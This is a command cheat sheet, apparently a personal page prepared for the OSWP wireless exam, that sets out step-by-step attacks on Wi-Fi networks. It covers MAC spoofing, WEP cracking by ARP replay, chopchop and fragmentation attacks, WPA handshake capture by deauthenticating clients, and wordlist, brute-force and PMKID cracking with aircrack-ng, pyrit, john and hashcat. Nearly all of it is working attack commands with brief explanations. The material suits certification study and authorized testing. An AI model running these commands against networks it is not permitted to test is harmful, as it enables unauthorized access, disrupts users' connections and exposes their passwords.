Last changed: 15.03.2020
Hacking wireless networks
This commandlist served as a cheat sheet for the Offensive Security Wireless Professional exam and shows the usage of the most common attack tools.
preparation
show and stop interfering processes
systemctl stop NetworkManager
airmon-ng check [kill]
change MAC address
macchanger -m 00:11:22:33:44:55 wlan0
toggle monitor mode
airmon-ng start wlan0
airmon-ng stop wlan0mon
card to card injection test
With two wireless interfaces in monitoring mode you can test which explicit attacks are supported.
aireplay-ng -9 -i wlan1mon wlan0mon
prevent Network Manager from managing devices
If you want to keep your Network Manager running you can blacklist the MAC addresses of the interfaces which shall be ignored.
/etc/NetworkManager/NetworkManager.conf
...
[keyfile]
unmanaged-devices=mac:00:11:22:33:44:55
...
traffic capture
capture traffic( 2.4 and 5GHz)
airodump-ng --band abg --manufacturer wlan0mon
show manufacturer information
airodump-ng-oui-update
airodump-ng --manufacturer wlan0mon
attacking wep
The major flaw of the wep encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of starting to dump the traffic, enforcing a lot of data packets and cracking the capture file.
collect ivs
airodump-ng -c 1 -w wep_file --ivs wlan0mon
open system authentication
aireplay-ng -1 60 -a <AP_MAC> -h <source_MAC> wlan0mon
shared key authentication
aireplay-ng -1 60 -y <xor_file> -a <AP_MAC> -h <source_MAC> wlan0mon
arp replay attack
aireplay-ng -3 -b <AP_MAC> -h <source_MAC> wlan0mon
chopchop attack
aireplay-ng -4 -b <AP_MAC> -h <source_MAC> wlan0mon
fragmentation attack
aireplay-ng -5 -b <AP_MAC> -h <source_MAC> wlan0mon
create ARP packet
packetforge-ng -0 -a <AP_MAC> -h <source_MAC> -l 255.255.255.255 -k 255.255.255.255 -y <xor_file> -w arp.cap
inject packet
aireplay-ng -2 -r arp.cap wlan0mon
crack the wep key
aircrack-ng wep_file.ivs
attacking wpa
WPA encrypted networks are regarded as secure and the only known attack is to brute force the 4-way handshake or the PMKID.
capture handshake
airodump-ng -c 1 -w wpa_file wlan0mon
deauthenticate client
aireplay-ng -0 1 -a <AP_MAC> -c <client_MAC> wlan0mon
strip unneeded packets
pyrit -r wpa_file.cap -o wpa_file_strip.cap strip
wordlist attack
aircrack-ng -w wordlist.txt wpa_file_strip.cap
pyrit -i wordlist.txt -r wpa_file_strip.cap attack_passthrough
brute force attack
john --incremental --stdout | aircrack-ng -w - wpa_file_strip.cap
precomputed pmk attack
pyrit -i wordlist.txt import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r wpa_file_strip.cap attack_db
speed up with qw
As with managing wireless networks from the command line the script qw can be used to simplify sniffing and capturing of wpa handshakes.
capture handshake
qw s -c 1 -f wpa_file
qw d <bssid>
automatic handshake capture
The tool hcxdumptool automatically tries to retrieve wlan handshakes from found networks and clients.
hcxdumptool -i wlan0 -o out.pcapng -c 1,6,11 --enable_status 1
To extract all needed data in a format compatible with hashcat
you can use
hcxpcapngtool
from hcxtools
hcxpcapngtool -o hashes *.pcapng
hashcat -m 22000 hashes some_wordlist.txt
If you want to crack only uniq handshakes you can filter your file with awk
.
grep 'WPA\*02\*' hashes | sort -t\* -k 4 | awk -F \* 'BEGIN{last=0}{ if (last != $4) { print; last=$4} }' > filtered_hashes